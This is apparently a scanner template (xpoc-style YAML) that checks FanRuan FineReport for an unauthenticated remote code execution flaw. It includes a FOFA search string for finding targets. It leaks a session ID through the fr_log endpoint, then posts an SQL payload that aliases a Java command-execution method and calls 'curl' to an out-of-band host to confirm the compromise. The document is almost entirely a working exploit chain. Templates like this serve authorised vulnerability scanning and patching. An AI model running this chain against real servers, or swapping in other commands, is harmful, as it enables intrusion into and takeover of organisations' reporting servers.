fanruan-finereport-fr-log-rce: 帆软 FineReport Fr Log Rce

id: fanruan-finereport-fr-log-rce

info:
  name: 帆软 FineReport Fr Log Rce
  author: xpoc
  severity: critical
  verified: true
  description: |
    FOFA: app="帆软-FineReport"
  reference:
    - https://xz.aliyun.com/t/11064
  tags: finereport,rce
  created: 2023/06/23

set:
  oob: oob()
  oobHTTP: oob.HTTP
  nowtime: timestamp_second(0)
rules:
  r0:
    request:
      method: GET
      path: /WebReport/ReportServer?op=fr_log&cmd=fg_errinfo&fr_username=admin
    expression: response.status == 200 && response.body.bcontains(b"sessionID")
    output:
      search: '"op=widget&widgetname=widget9&sessionID=(?P<sessionID>.*?)\",\"type".bsubmatch(response.body)'
      sessionID: search["sessionID"]
  r1:
    request:
      method: POST
      path: /WebReport/ReportServer?op=fr_dialog&cmd=parameters_d&sessionID={{sessionID}}
      body: __parameters__={"LABEL1":"TYPE:","TYPE":"6;CREATE ALIAS RUMCMD FOR \"com.fr.chart.phantom.system.SystemServiceUtils.exeCmd\";CALL RUMCMD('curl {{oobHTTP}}');select msg, trace, sinfo, logtime from fr_errrecord where 1=1","LABEL3":"START_TIME:","START_TIME":"2020-08-11 00:00","LABEL5":"END_TIME:","END_TIME":"2020-08-11 16:41","LABEL7":"LIMIT:","LIMIT":2}
    expression: response.status == 200
  r2:
    request:
      method: GET
      path: /WebReport/ReportServer?_={{nowtime}}585&__boxModel__=true&op=page_content&sessionID={{sessionID}}&pn=1
    expression: oobCheck(oob, oob.ProtocolHTTP, 3)
expression: r0() && r1() && r2()